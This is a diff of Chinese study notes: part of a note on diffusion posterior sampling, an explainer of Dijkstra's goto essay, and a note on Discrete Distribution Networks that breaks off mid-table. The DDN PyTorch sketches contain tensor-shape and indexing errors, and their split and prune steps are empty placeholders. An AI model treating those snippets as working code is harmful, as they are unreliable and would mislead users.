\sim \mathcal{N}(0, \Sigma_y) +\] + +目标:从 \(p(x_0 \mid y) \propto p_{\text{pr}}(x_0)\, p(y \mid x_0)\) 采样。扩散模型学的是先验的 score;**后验采样**要在去噪过程中注入 **likelihood guidance**。 + +### 2. 为什么中间步必须近似? + +真后验满足 Bayes: + +\[ +p(x_t \mid y) \propto p(x_t)\, p(y \mid x_t) +\] + +但 \(p(y \mid x_t) = \int p(y \mid x_0)\, p(x_0 \mid x_t)\, dx_0\) 一般**没有闭式**。DPS 等用 **Tweedie 均值** \(m_{0|t}(x_t)\) 把 \(p(x_0 \mid x_t)\) **压成 Dirac**,得到 tractable guidance——代价是丢掉**方差/多模态结构**。 + +### 3. 有限样本透镜(FSR) + +把先验换成经验分布: + +\[ +p_N^{\text{pr}}(x) = \frac{1}{N}\sum_{i=1}^{N} \delta(x - x^{(i)}) +\] + +在 VP-SDE 下(\(\bar{\alpha}(t)\) 为噪声 schedule): + +- **边缘** \(p_t^N(x_t)\):对每个训练点 \(x^{(i)}\) 加噪后的高斯混合 +- **去噪** \(p_{0|t}^N(x_0 \mid x_t)\):离散权重 \(w_i(x_t,t)\) 在 \(\{x^{(i)}\}\) 上的组合 +- **似然** \(p_{y|t}^N(y \mid x_t)\):对 \(i\) 混合 \(\mathcal{N}(y; \mathcal{A}(x^{(i)}), \Sigma_y)\) +- **后验** \(p_{t|y}^N(x_t \mid y)\):再乘上 measurement 权重 → **仍是高斯混合,可算、可采** + +\(N \to \infty\) 时以 Monte Carlo 率 \(O(N^{-1/2})\) 逼近真后验(固定 \(t>0\));\(t \to 0\) 时需要更大的 \(N\)。 + +### 4. 被诊断的近似族 + +| 方法族 | 代表 | 对 \(p(x_0 \mid x_t)\) 的近似 | 特点 | +|--------|------|------------------------------|------| +| Dirac | **σ-DPS**, **ζ-DPS** | \(\delta(x_0 - m_{0|t})\) | 最简单;spread 全丢 | +| Gaussian | **ΠGDM**, **TMPD** | 高斯,TMPD 协方差用真 \(C_{0|t}\) | 线性问题更准;仍可能错 spread | + +### 5. 论文归纳的失败模式 + +1. **中间 spread 错误**:σ-DPS 全程方差偏;均值在中间 \(t\) 也可能偏 +2. **模态权重错**:该重的后验模态权重低,不该出现的 prior 模态被采样(**prior 幻觉**) +3. **likelihood 幻觉**:测量一致但先验极不可能的模式 +4. **早停敏感**:spread 错 → 最优 stopping time 依赖任务,无通用默认值 +5. **ζ 调参权衡**:大 \(\zeta\) 加强似然可能减幻觉,也可能**单模态坍缩** + +--- + +## 代码示例 1:有限样本后验权重(玩具 GMM 先验 + 线性测量) + +下面用 NumPy 实现 FSR 在**单个** \(x_t, t\) 上的后验混合权重(1D 示意): + +```python +import numpy as np + +def vp_alpha_bar(t, beta_max=20.0): + """简化的 VP schedule:返回 sqrt(ᾱ(t)) 与 (1-ᾱ(t))。""" + # 连续近似:ᾱ(t) = exp(-0.5 * beta_max * t^2),t ∈ [0,1] + alpha_bar = np.exp(-0.5 * beta_max * t ** 2) + return np.sqrt(alpha_bar), 1.0 - alpha_bar + +def fsr_posterior_weights(x_train, x_t, t, y, A, sigma_y=0.1): + """ + x_train: (N,) 有限样本先验支撑 + x_t: 当前噪声状态(标量) + y: 观测 A @ x0 + noise(标量线性 A) + 返回: 对 x_train 每个点的后验 responsibility(未归一化可再归一化) + """ + sqrt_ab, one_minus_ab = vp_alpha_bar(t) + N = len(x_train) + # p(x_t | x^{(i)}) ∝ N(x_t; sqrt(ᾱ) x^{(i)}, (1-ᾱ)) + log_px_t_given_i = -0.5 * (x_t - sqrt_ab * x_train) ** 2 / one_minus_ab + log_px_t_given_i -= 0.5 * np.log(2 * np.pi * one_minus_ab) + + # p(y | x^{(i)}) ∝ N(y; A * x^{(i)}, sigma_y^2) + pred_y = A * x_train + log_py_given_i = -0.5 * (y - pred_y) ** 2 / sigma_y ** 2 + log_py_given_i -= 0.5 * np.log(2 * np.pi * sigma_y ** 2) + + log_joint = log_px_t_given_i + log_py_given_i + log_joint -= log_joint.max() # 数值稳定 + w = np.exp(log_joint) + w /= w.sum() + return w + +# 双模态先验:两团训练点 +rng = np.random.default_rng(0) +x_train = np.concatenate([ + rng.normal(-2.0, 0.2, 500), + rng.normal(+2.0, 0.2, 500), +]) +A = 1.0 +x0_true = -2.0 +y = A * x0_true + rng.normal(0, 0.1) + +for t in [0.8, 0.4, 0.1]: + w = fsr_posterior_weights(x_train, x_t=0.0, t=t, y=y, A=A) + left_mass = w[x_train < 0].sum() + print(f"t={t:.1f} P(模态 x<0 | y) ≈ {left_mass:.3f}") +``` + +**读输出**:在 \(t=0.8\) 测量已把权重推向 \(x<0\) 模态;若某 DPS 近似在中间 \(t\) spread 过窄,轨迹可能提前锁死在错误模态或漏掉正确模态——FSR 的 `w` 就是对照 ground truth。 + +--- + +## 代码示例 2:Dirac(DPS 式)vs 完整 FSR spread + +第二个例子比较 **Dirac 近似均值** 与 **FSR 真后验均值/方差**: + +```python +def fsr_mean_var(x_train, w): + mu = (w * x_train).sum() + var = (w * (x_train - mu) ** 2).sum() + return mu, var + +def dirac_dps_mean(x_train, x_t, t): + """σ-DPS 思路:p(x0|xt) ≈ δ(m_{0|t}),m_{0|t} 为 Tweedie 均值。""" + sqrt_ab, one_minus_ab = vp_alpha_bar(t) + # 权重仅来自 p(x_t | x^{(i)}),无 y + log_w = -0.5 * (x_t - sqrt_ab * x_train) ** 2 / one_minus_ab + log_w -= log_w.max() + w_prior = np.exp(log_w) + w_prior /= w_prior.sum() + return (w_prior * x_train).sum() + +t = 0.5 +x_t = 0.5 +w_post = fsr_posterior_weights(x_train, x_t, t, y, A) +mu_fsr, var_fsr = fsr_mean_var(x_train, w_post) +mu_dirac = dirac_dps_mean(x_train, x_t, t) + +print(f"FSR E[x0|xt,y] = {mu_fsr:.3f}, Var = {var_fsr:.4f}") +print(f"Dirac m_{0|t} = {mu_dirac:.3f} (不含 y 的 Tweedie 均值)") +print(f"真 x0 = {x0_true}, 观测 y = {y:.3f}") +``` + +**要点**: + +- Dirac 用的 \(m_{0|t}\) **不看 \(y\)**;DPS 的 guidance 另加梯度项,但 spread 仍像 Dirac 一样缺失 +- FSR 的 `var_fsr` 告诉你**此刻**后验还有多宽——σ-DPS 若 implicit 方差更小,就会 **under-spread** → 模态权重失真 + +--- + +## 实验与诊断工作流(论文做法) + +1. **选先验**:离散 / 高斯 / GMM 等可解析对照 +2. **建 FSR**:从 \(N\) 个 i.i.d. 样本构造 \(p_N^{\text{pr}}\) +3. **固定 \(t\)**:算 \(p_{t|y}^N\) 与 moment(均值、协方差、模态 mass) +4. **跑 σ-DPS / ζ-DPS / TMPD**:在同一 \((y, t)\) 记录近似 posterior 的 moment +5. **对比 gap**:spread 低估 → 查 prior 幻觉;spread 高估 → 查 likelihood 幻觉与早停 + +论文报告:FSR 在**中等较大 \(t\)** 精度高;\(t \to 0\) 需增大 \(N\)。σ-DPS 常在中间步均值、方差都偏;ζ 调参只能部分缓解,无法消除所有幻觉类型。 + +--- + +## 与其他工作的关系 + +| 方向 | 代表 | 与本文关系 | +|------|------|------------| +| DPS 原论文 | Chung et al., 2023 | 被诊断的 Dirac 近似来源 | +| Feynman-Kac 偏差分析 | arXiv:2605.06538 | 从 PDE/路径期望解释 DPS 偏差;本文从**有限样本可算后验**给工程诊断 | +| FPS / 粒子滤波 | Dou & Song, ICLR 2024 | 渐近正确但贵;FSR 是**解析** surrogate 而非采样算法 | +| 计算不可 tractability | ICML 2024 等 | 说明精确后验采样难;本文在**可算 toy / FSR** 上隔离近似误差 | + +--- + +## 局限与后续 + +- **\(N\) 与 \(t\)**:越接近 \(t=0\),准确评估所需样本数越大 +- **学出来的先验**:FSR 用经验点集;真实扩散 prior 是神经网络 score,诊断需用训练集或 coreset 近似 +- **未覆盖**:prior 学习误差、极低 \(p_t(x_t)\) 区域的 score 质量 + +--- + +## 给实践者的三条建议 + +1. **不要只看最终图**:对关键 \(t\) 用 FSR(或小型验证集)检查 posterior spread 是否合理 +2. **多模态先验要格外小心**:即使测量线性、后验单模态,**先验多峰 + Dirac** 仍可能 hallucinate +3. **把 FSR 当单元测试**:新 guidance 公式上线前,在 GMM/离散先验上对比 moment,比只盯 PSNR 更可靠 + +--- + +## 小结 + +| 问题 | 答案 | +|------|------| +| **When** 失败? | 中间 timestep 的 likelihood/denoiser 近似导致 spread 错时 | +| **Why**? | Dirac/Gaussian 矩匹配丢失多模态与方差 → 模态权重与轨迹偏 | +| **How**? | 用 **Finite-Sample Lens** 构造可解析后验,对比 moment 与样本 | +| **意外结论** | 非线性 \(\mathcal{A}\)、多模态后验**不是必要条件**;多模态先验即可 | + +--- + +## 延伸阅读 + +- [DPS 原论文](https://arxiv.org/abs/2209.14687) — Diffusion Posterior Sampling for General Noisy Inverse Problems +- [ΠGDM / TMPD 等矩匹配方法](https://arxiv.org/abs/2305.08995) — 高斯近似族 +- [Feynman-Kac 偏差分析](https://arxiv.org/abs/2605.06538) — 路径级解释 DPS 偏差的互补视角 +- [[paged-attention-vllm]] — 推理系统侧优化;与「采样是否正确」正交但同属生成栈 diff --git a/src/content/docs/papers/dijkstra-goto-1968.md b/src/content/docs/papers/dijkstra-goto-1968.md new file mode 100644 index 000000000..6aa8edb66 --- /dev/null +++ b/src/content/docs/papers/dijkstra-goto-1968.md @@ -0,0 +1,239 @@ +--- +title: Go To Statement Considered Harmful — Dijkstra 1968 结构化编程宣言 +来源: https://homepages.cwi.nl/~storm/teaching/reader/Dijkstra68.pdf +日期: 2026-06-13 +分类: 编程语言 +子分类: 类型与 PL 理论 +难度: 入门 +provenance: pipeline-v3 +--- + +## 是什么 + +1968 年 3 月,荷兰计算机科学家 **Edsger W. Dijkstra** 在 *Communications of the ACM* 上发表了一封只有两页的「读者来信」,标题是 **Go To Statement Considered Harmful**(`goto` 语句是有害的)。全文没有一行代码,却改变了此后半个世纪程序员写程序的方式。 + +论文的核心主张很直白:**`goto` 应该从所有「高级」编程语言中废除**(机器码除外)。Dijkstra 观察到,程序员产出的代码质量,与程序里 `goto` 的密度呈负相关——`goto` 越多,程序越难理解、越难推理、越难证明正确。 + +日常类比:想象你在读一本小说。正常写法是「第一章 → 第二章 → 第三章」,偶尔出现「如果下雨就跳第五章」这种分支,或者「回到第三章开头再读一遍」这种循环——你始终知道自己在书的哪一页。`goto` 则像书里随机写着「现在翻到第 217 页第 3 段」——你当然还能读下去,但**再也说不清「故事进行到哪一步」**,变量人物关系、伏笔含义都会在这一跳里变得暧昧不清。 + +这篇短文常被视作 **结构化编程(Structured Programming)** 运动的公开起点。它本身不发明 `if`/`while`/`for`,而是解释为什么这些结构比裸 `goto` 更适合人类大脑。 + +## 历史背景 + +| 时间 | 事件 | +|------|------| +| 1966 | Bohm & Jacopini 证明:任意流程图都可改写为只用**顺序、选择、迭代**三种结构 | +| 1968-03 | Dijkstra 发表本文(原稿标题是 *A Case against the GO TO Statement*,编辑 Niklaus Wirth 改成了现在更刺眼的标题) | +| 1970s | Pascal、C 等语言保留 `goto` 但主流教材开始强调结构化写法 | +| 1980s+ | Java 等语言直接取消 `goto`;C# 保留 `goto` 但视为代码异味 | + +Dijkstra 后来抱怨:IBM 偷走了「结构化编程」这个词,有人把它**简化成「禁止 goto」**——那只是冰山一角。他真正关心的是:**我们能否用有限的、可推理的程序结构,构造足够表达力的软件,并在此基础上证明正确性。** + +## 为什么重要 + +不理解这篇两页纸,下面这些事都没法放在同一张图上: + +- 为什么现代语言把 `if`/`else`、`while`、`for` 当作一等公民,却把 `goto` 藏进角落或干脆删掉 +- 为什么代码审查里「满屏跳转标签」会被一眼打回 +- 为什么「能读懂代码」和「能证明代码没错」在 Dijkstra 眼里是同一件事的两面 +- 为什么后来出现 **「X considered harmful」** 模板文章(从 `unsigned` 到 `cookies` 都有人写过) + +更重要的是论文里那个少被引用、但技术上最锋利的论点:**程序执行到某一刻时,变量值的含义依赖于「执行进度」;而 `goto` 会破坏你用「进度坐标」理解程序的能力。** + +## 核心概念 + +### 1. 执行进度的「坐标系」 + +Dijkstra 问:怎样描述一个正在运行的程序「进行到哪了」? + +在没有 `goto`、只有顺序语句时,一个**文本索引**(textual index)就够了——就是「当前执行到源文件的第几行」。 + +加入 **过程调用(procedure)** 后,一个索引不够:你得记录「正在执行哪个过程的哪一行」,以及「这是第几层嵌套调用」——变成一串文本索引,长度等于动态调用深度。 + +加入 **循环(repetition)** 后,还要加 **动态索引(dynamic index)**:第几次进入这个 `while`?嵌套循环时,索引序列混合「文本位置 + 第几轮循环」。 + +关键性质:**这些索引的值不由程序员随手指定,而是由程序文本和执行过程自动生成。** 它们是描述进度的**独立坐标**。 + +### 2. 变量含义依赖于进度 + +论文最著名的例子(意译): + +> 你要统计房间里的人数 `n`。每当看到有人进门,就把 `n` 加 1。 +> 在「已经看到有人进门」和「还没执行 `n++`」之间的那一瞬间, +> **`n` 的值等于房间里实际人数减 1。** + +这不是 bug,而是**进度与变量之间的约定**。你能说清「此刻执行到哪一步」,才能说清「此刻 `n` 代表什么」。 + +`goto` 的问题在于:它允许控制流任意跳跃,使得**很难找到一组简单、稳定的坐标**来刻画进度。有人试图用「某些关键变量的值」当坐标,但 Dijkstra 指出——**变量值的语义本身就要靠进度来解释**,这形成循环依赖。 + +唯一总能用的坐标是「从程序启动以来执行了多少条语句」——像一台归一化时钟。它唯一,但**毫无帮助**:在这个坐标系里,表达「`n` 等于房间人数减 1」这类陈述会变得极其笨重。 + +### 3. `goto` 是「太原始的邀请」 + +Dijkstra 的原话精神:`goto` **本身太 primitive**,它太像一张邀请函,邀请你把程序写成一团乱麻。`if`、`while`、`repeat`、`case`、过程调用等结构,是在**给跳转套上缰绳**——不是消灭控制流,而是让控制流可被抽象、可被归纳证明。 + +这与 Bohm-Jacopini 的结构定理一致:表达能力上不必然需要 `goto`;需要的是**可管理的控制流纪律**。 + +### 4. 与正确性证明的关系 + +Dijkstra 在同一时期的笔记(EWD 系列)里把观点说得更满:证明程序正确,不能靠穷举所有输入(组合爆炸);必须依赖**程序结构**(数学归纳法适配循环、抽象适配过程)。`goto` 让「从静态文本推断动态行为」变难,直接损害这条路线。 + +## 实践案例 + +### 案例 1:面条代码 vs 结构化改写 + +下面是一段带有 `goto` 的伪 C 代码,实现「读入正数并求和,遇到非正数则结束」: + +```c +/* 风格 A:goto + 标签 — 能跑,但进度模糊 */ +int sum = 0, x; +start: + x = read(); + if (x <= 0) goto done; + sum += x; + goto start; +done: + print(sum); +``` + +等价的结构化写法: + +```c +/* 风格 B:while — 进度坐标清晰:在循环第几轮一目了然 */ +int sum = 0, x; +while (1) { + x = read(); + if (x <= 0) break; + sum += x; +} +print(sum); +``` + +两种写法机器层面可能生成类似的跳转指令,但人类读者在风格 B 里自带坐标:**「我们在 `while` 的某一轮」**。审查者可以说:「循环不变式:`sum` 是已读正数的和」——这对证明与维护至关重要。 + +### 案例 2:用 `goto` 实现状态机 — 为何后来改用 `switch` + +早期网络协议常手写状态机。`goto` 版: + +```c +enum { WAIT_HDR, READ_BODY, DONE } state = WAIT_HDR; + +dispatch: + if (state == WAIT_HDR) { + if (!read_header()) goto error; + state = READ_BODY; + goto dispatch; + } else if (state == READ_BODY) { + if (!read_body()) goto error; + state = DONE; + goto dispatch; + } + return OK; +error: + return FAIL; +``` + +结构化改写(表驱动或 `switch`): + +```c +while (state != DONE) { + switch (state) { + case WAIT_HDR: + if (!read_header()) return FAIL; + state = READ_BODY; + break; + case READ_BODY: + if (!read_body()) return FAIL; + state = DONE; + break; + default: + return FAIL; + } +} +return OK; +``` + +`switch` 并没有魔法,但它把「下一状态」绑在**可枚举的局部结构**上,读者不必在标签海洋里找「从 `error` 能跳到哪儿」。 + +### 案例 3:Linux 内核里仍存在的 `goto` — 何时算「有纪律的使用」 + +Linux 内核风格指南允许 **`goto` 仅用于统一的错误清理路径**(常见于 C 资源申请): + +```c +int setup(void) { + if (alloc_a() < 0) return -ENOMEM; + if (alloc_b() < 0) goto err_a; + if (alloc_c() < 0) goto err_b; + return 0; +err_b: + free_b(); +err_a: + free_a(); + return -ENOMEM; +} +``` + +这不是反驳 Dijkstra,而是 **C 语言缺少 defer/RAII 的折中**:所有 `goto` 目标向下、单向、用于清理,不形成 arbitrary 循环。社区共识是:**这是受控的例外,不是鼓励面条代码。** + +## 结构化程序的三种基本结构 + +Bohm & Jacopini (1966) 与 Dijkstra 共同支撑的图片可以记成: + +``` +顺序 (Sequence) :一条接一条执行 +选择 (Selection) :if / else / case — 二选一或多选一 +迭代 (Iteration) :while / for / repeat — 条件满足则重复 +``` + +现代语言再加 **过程抽象**(函数、模块)处理重复逻辑与命名层次。这五样足以表达可计算性意义上的「所有程序」,同时保留可读的进度坐标。 + +## 踩过的坑 + +1. **「禁止 goto」≠ 结构化编程的全部** + Dijkstra 本人后来吐槽,业界把结构化编程降格成「不用 goto」。数据抽象、不变式、分层设计同样是支柱。 + +2. **机器码里仍有跳转** + 论文说的是**高级语言**应提供更高层结构,让程序员不必亲手编织蜘蛛网。编译器把 `while` lowering 成 `jmp` 完全 OK。 + +3. **少数场景 `goto` 仍有辩护** + 错误处理(C)、跳出多层循环(某些语言用 labeled break 替代)、极致性能手写汇编。关键是:**跳转是否受纪律约束**,而非绝对禁字。 + +4. **标题是编辑改的** + 原稿较温和 (*A case against...*),Wirth 改成 *Considered Harmful* 引爆传播。读正文时别被标题吓到——论证是几何与逻辑性的,不是道德审判。 + +5. **与「函数式没有循环」不是一回事** + 函数式用递归表达迭代,坐标系换成「调用栈深度 + 归纳假设」。争论焦点相同:**人类如何跟踪计算进度。** + +## 适用 vs 不适用 + +| 场景 | 建议 | +|------|------| +| 业务逻辑、库 API、教学示例 | 用 `if`/`while`/`for`/函数,避免 `goto` | +| 需要形式化验证、安全关键系统 | 遵循结构化子集;`goto` 使静态分析变难 | +| C 资源清理、内核错误路径 | 受控 `goto` 可接受,集中单出口清理 | +| 手写汇编、JIT 代码生成 | 底层跳转不可避免,与本文讨论的抽象层不同 | + +## 与今天的关系 + +- **Rust / Go / Java**:无 `goto` 或极少用;错误用 `Result`、`panic`、defer 模式处理。 +- **静态分析 & 编译器优化**:CFG(控制流图)上的 structured region 更易做数据流分析;任意 `goto` 破坏 structuredness。 +- **「代码异味」文化**:Spaghetti code 仍是对 untamed `goto` 的贬称。 + +1968 年的两页纸,本质是在说:**编程不仅是告诉机器做什么,更是让人类(包括六个月后的你自己)能追踪「故事进行到哪一页」。** `goto` 撕掉了页码;`if` 和 `while` 把页码印了回去。 + +## 延伸阅读 + +- Dijkstra, EWD 215 / EWD 268 — 结构化编程更长笔记 +- Bohm, C. & Jacopini, G. (1966) — 顺序/选择/迭代的结构定理 +- Knuth, D. (1974) *Structured Programming with go to Statements* — 对「一刀切禁止」的反驳与调和 +- Wirth, N. — Pascal 语言设计,与本文发表于同一时期的 ALGOL 传统 + +## 原文信息 + +| 字段 | 内容 | +|------|------| +| 作者 | Edsger W. Dijkstra | +| 发表 | Communications of the ACM, Vol. 11, No. 3, March 1968, pp. 147–148 | +| 机构 | Technological University, Eindhoven | +| 原文 PDF | [CWI 镜像](https://homepages.cwi.nl/~storm/teaching/reader/Dijkstra68.pdf) | +| ACM DOI | [10.1145/362929.362947](https://doi.org/10.1145/362929.362947) | diff --git a/src/content/docs/papers/discrete-dist-net.md b/src/content/docs/papers/discrete-dist-net.md new file mode 100644 index 000000000..01d87d2ab --- /dev/null +++ b/src/content/docs/papers/discrete-dist-net.md @@ -0,0 +1,317 @@ +--- +title: Discrete Distribution Networks(离散分布网络) +来源: https://arxiv.org/abs/2401.00036 +日期: 2026-06-13 +分类: 机器学习 +子分类: 生成模型 +provenance: pipeline-v3 +--- + +# Discrete Distribution Networks(离散分布网络) + +## 一句话总结 + +DDN 是一种全新的生成模型:它不让神经网络只"吐出"一张图,而是同时吐出 K 张图,用这 K 张图组成的离散分布来逼近真实数据的分布。 + +## 日常类比:厨师做菜 + +想象你是一位学厨艺的学生,目标是模仿一道名菜。 + +传统模型(如 GAN、DDPM)的做法是:厨师每次尝试做一道菜,做得好就记住配方,做得不好就扔垃圾桶重来。要做出足够多样的菜,厨师需要尝试非常多次。 + +DDN 的做法是:厨师每次同时做 K 道"半成品菜",然后尝一尝哪一道跟目标最接近,只把最接近的那一道交给下一轮继续加工。第一轮可能做得很粗糙,但第二轮会基于第一轮最好的结果再做 K 道,第三轮再选最好的继续……层数越多,最终成品就越接近目标。 + +关键区别:每次不只试一次,而是同时试 K 次,然后"择优录取"。 + +## 核心概念 1:离散分布层(DDL) + +DDN 的基本构建块叫 **Discrete Distribution Layer(离散分布层,DDL)**。每一层做三件事: + +1. **生成 K 个候选**:接收上一层的输入(第一层时输入是全零),通过 K 个"输出节点"同时生成 K 张图像 +2. **择优**:从 K 张中选一张与目标图像最接近的(用 L2 距离衡量) +3. **传递**:被选中的那一张传给下一层,同时记录下被选中的是第几个节点(这个编号就是"隐变量") + +如果网络有 L 层、每层 K 个节点,总共有 K^L 种可能的输出路径。即使 K=512、L=128,K^L 也是一个天文数字,远超任何数据集的规模。 + +**用代码理解:** + +```python +import torch +import torch.nn as nn + +# 假设有一层 DDL,包含 K=5 个输出节点 +# 每个节点是一组 1x1 卷积,把特征图变成图像 +K = 5 +batch_size = 1 +height, width, channels = 64, 64, 3 + +# 每个输出节点的 1x1 卷积参数 +# shape: [K, channels, channels] —— 每个节点独立学习如何"变换特征到图像" +output_nodes = nn.Parameter( + torch.randn(K, channels, channels) +) + +def forward_ddl_layer(features, output_nodes, target_image): + """ + 前向传播:K 个候选 -> 选最优 -> 计算损失 + + Args: + features: 上一层的特征图, shape [batch, channels, H, W] + output_nodes: K 个节点的卷积核, shape [K, C, C] + target_image: 目标图像, shape [batch, C, H, W] + + Returns: + best_output: 选出的最佳输出图像 + best_index: 最佳输出对应的节点编号(隐变量) + loss: 仅对选中的输出计算 L2 损失 + """ + batch, C, H, W = target_image.shape + + # 步骤 1:K 个节点各自生成一张图像 + # 对每个节点做 1x1 卷积 -> 得到 K 张候选图像 + # output_nodes shape: [K, C, C] + # features shape: [batch, C, H, W] + # 展开 features 为 [batch*H*W, C],然后跟每个节点的卷积核做矩阵乘法 + x_flat = features.permute(0, 2, 3, 1).reshape(-1, C) # [batch*H*W, C] + candidates = torch.matmul(x_flat, output_nodes.T) # [batch*H*W, K] + candidates = candidates.reshape(batch, H, W, K, C) # [batch, H, W, K, C] + candidates = candidates.permute(0, 4, 1, 2, 3) # [batch, C, H, W, K] + + # 步骤 2:择优——计算每张候选与目标的 L2 距离,选最小的 + distances = torch.norm(candidates - target_image, p=2, dim=1) # [batch, H, W, K] + distances = distances.mean(dim=[1, 2]) # [batch, K] 平均所有像素 + best_index = torch.argmin(distances, dim=1) # [batch] + + # 步骤 3:取出被选中的输出 + batch_indices = torch.arange(batch) + best_output = candidates[batch_indices, :, :, best_index, :] # [batch, C, H, W] + + # 步骤 4:只对选中的输出计算损失 + loss = torch.norm(best_output - target_image, p=2) / batch + + return best_output, best_index, loss +``` + +## 核心概念 2:Split-and-Prune 优化算法 + +DDN 面临一个关键挑战:每一层只对被选中的节点更新参数,那些没被选中的节点就会"饿死"(类似 VQ-VAE 中的 dead codebooks 问题)。DDN 的解决方案是借鉴进化论的 **Split-and-Prune**: + +- **Split(分裂)**:当某个节点被选中的频率过高(超过阈值 2/K),就克隆它变成两个节点。刚克隆时参数完全一样,但后续训练中它们会被不同的样本引导,逐渐分化成不同的输出 +- **Prune(修剪)**:当某个节点长期不被选中(低于阈值 0.5/K),就直接删除它 + +这就像生物进化:频繁被"自然选择"的物种会繁衍分裂,长期被淘汰的物种会灭绝。 + +```python +class SplitAndPrune: + """ + Split-and-Prune 优化器 + 类比:物种的繁衍(分裂)与灭绝(修剪) + + - 被选中的节点就像"适者生存",获得繁衍机会 + - 不被选中的节点就像"不适者",面临灭绝 + - 分裂后的两个子节点一开始相同,但后续训练会让它们"分道扬镳" + """ + + def __init__(self, K=512): + self.K = K + self.split_threshold = 2.0 / K # 超过此频率就分裂 + self.prune_threshold = 0.5 / K # 低于此频率就修剪 + self.counts = torch.zeros(K) # 每个节点的选中计数 + self.num_samples = 0 + + def step(self, selected_index, K_current): + """ + 训练一步:选择节点 + 可选的分裂/修剪 + + Args: + selected_index: 本轮被选中的节点编号 + + Returns: + needs_split: 是否需要执行 Split + needs_prune: 是否需要执行 Prune + """ + self.counts[selected_index] += 1 + self.num_samples += 1 + + # 计算每个节点的相对频率 + frequencies = self.counts[:K_current] / self.num_samples + + # 找出频率最高和最低的节点 + max_freq_idx = torch.argmax(frequencies).item() + min_freq_idx = torch.argmin(frequencies).item() + + needs_split = frequencies[max_freq_idx] > self.split_threshold + needs_prune = (K_current > 2) and (frequencies[min_freq_idx] < self.prune_threshold) + + if needs_split: + # 克隆最高频节点:复制参数,平分计数 + # 两个新节点初始参数相同,但后续会被不同样本引导 + pass + + if needs_prune: + # 删除最低频节点,从网络中移除 + pass + + return needs_split, needs_prune +``` + +## 核心概念 3:生成与重建 + +DDN 有两种用法: + +### 3.1 重建(Reconstruction) + +给定一张目标图片,从全零开始逐层推理,每层选最接近目标的候选。最终输出的图像就是重建结果。沿着推理路径记录的节点编号序列 [k1, k2, ..., kL] 就是这张图片的"隐变量编码"。 + +### 3.2 生成(Generation) + +把 Guided Sampler(择优采样器)换成 **随机选择**。因为总共有 K^L 条路径,随机选一条就能生成一张新图片。 + +**生成过程代码:** + +```python +def generate_ddn(ddn_network, L, K, random_seed=42): + """ + 从 DDN 生成一张新图片 + + 训练时:每层选最接近目标的(Guided Sampler) + 生成时:每层随机选一个节点(Random Sampler) + + Args: + ddn_network: 训练好的 DDN 网络(包含 L 层 DDL) + L: 网络层数 + K: 每层的节点数 + random_seed: 随机种子 + + Returns: + generated_image: 生成的图像 [C, H, W] + latent_codes: 隐变量编码序列 [L],每个元素是 0..K-1 的整数 + """ + import random + + torch.manual_seed(random_seed) + random.seed(random_seed) + + # 第一层输入:全零 + current_input = torch.zeros(1, 3, 64, 64) + latent_codes = [] + + for layer_idx in range(L): + layer = ddn_network.layers[layer_idx] + + # 当前层生成 K 个候选 + candidates = layer(current_input) # shape: [1, 3, 64, 64, K] + + # 关键:随机选择,而非择优选择 + chosen_idx = random.randint(0, K - 1) + latent_codes.append(chosen_idx) + + # 取出选中的候选作为下一层输入 + current_input = candidates[:, :, :, chosen_idx, :] + + # 最终输出就是生成的图像 + generated_image = current_input.squeeze(0) + return generated_image, latent_codes + +# 举例:假设 DDN 的 K=512, L=128 +# 隐变量编码长度 = 128,每个值是 0~511 +# 信息量 = 128 * log2(512) = 128 * 9 = 1152 bits +# 一张 64x64 RGB 图像的原始像素信息量约为 64*64*24 = 98304 bits +# 压缩比 = 98304 / 1152 ≈ 85:1 +print(f"隐变量信息量: {128 * 9} bits") +print(f"原始图像信息量: {64 * 64 * 24} bits") +print(f"压缩比: ~{64*64*24 // (128*9)}:1") +``` + +## 核心概念 4:零样本条件生成(ZSCG) + +这是 DDN 最吸引人的特性之一。传统生成模型要支持"文本生成图片"或"低分辨率转高分辨率",需要为每种条件单独训练一个模型。DDN 不需要:它可以在推理时动态切换"择优标准"。 + +做法:把 Guided Sampler 中的"L2 距离最小"替换为其他标准。例如: +- 用分类器:选属于目标类别概率最高的 +- 用 CLIP:选与文本描述语义最接近的 +- 用超分辨率:选经过下采样后最接近低分辨率条件的 + +**最关键的是:DDN 不需要梯度!** 它只依赖分类器的输出概率(argmax),而不是反向传播。这意味着可以用黑盒模型(如闭源 API)作为条件引导。 + +```python +def guided_sampling_with_classifier(candidates, classifier, target_class): + """ + 分类器引导的零样本条件生成 + + 训练时选"最接近目标"的,生成时选"最符合类别"的 + + Args: + candidates: K 个候选图像, shape [1, C, H, W, K] + classifier: 分类器(可以是黑盒,只要能给出类别概率) + target_class: 目标类别索引 + + Returns: + best_index: 被选中的节点编号 + """ + batch, C, H, W, K = candidates.shape + + # 将 K 个候选分别输入分类器 + # candidates: [1, C, H, W, K] -> [K, C, H, W] + candidate_list = candidates.permute(4, 0, 1, 2, 3).squeeze(1) + + # 分类器给出每个候选属于目标类别的概率 + probs = classifier(candidate_list)[:, target_class] # [K] + + # 选概率最高的 + best_index = torch.argmax(probs).item() + + return best_index + + +def conditional_generate(ddn_network, L, K, classifier, target_class): + """ + 条件生成:给定类别,生成该类别的图片 + 不需要任何梯度反向传播! + """ + current_input = torch.zeros(1, 3, 64, 64) + latent_codes = [] + + for layer_idx in range(L): + layer = ddn_network.layers[layer_idx] + candidates = layer(current_input) + + # 用分类器引导选择,而非随机选择 + idx = guided_sampling_with_classifier(candidates, classifier, target_class) + latent_codes.append(idx) + + current_input = candidates[:, :, :, idx, :] + + return current_input.squeeze(0), latent_codes +``` + +## 训练技巧 + +DDN 提出了一些实用的训练技巧: + +**Chain Dropout(链式丢弃)**:训练中有一定概率(默认 5%)让每层改用随机选择而非择优选择。防止网络只在少数几条路径上过拟合,相当于给训练加了正则化。 + +**Learning Residual(残差学习)**:借鉴 ResNet,每层不是直接输出图像,而是输出"与前一层输出的残差"。两层之间的计算量很小,直接回归图像很难,学残差就容易多了。 + +**Leak Choice(选择泄漏)**:每个输出节点额外学习一套特征,直接传给下一层作为"选择信号"。这样下一层不需要从图像中反复解析上一层的决定,训练更高效。 + +## 与其他生成模型对比 + +| 特性 | GAN | VAE | Diffusion | DDN | +|------|-----|-----|-----------|-----| +| 生成方式 | 单样本生成 | 单样本生成 | 多步迭代生成 | 每层 K 候选择优 | +| 重建能力 | 弱(无编码器) | 强(有编码器) | 弱(反向过程) | 强(天然可重建) | +| 条件生成 | 需单独训练 | 需单独训练 | 需单独训练 | 推理时动态引导 | +| 隐变量 | 无 | 连续向量 | 无 | 离散整数序列 | +| 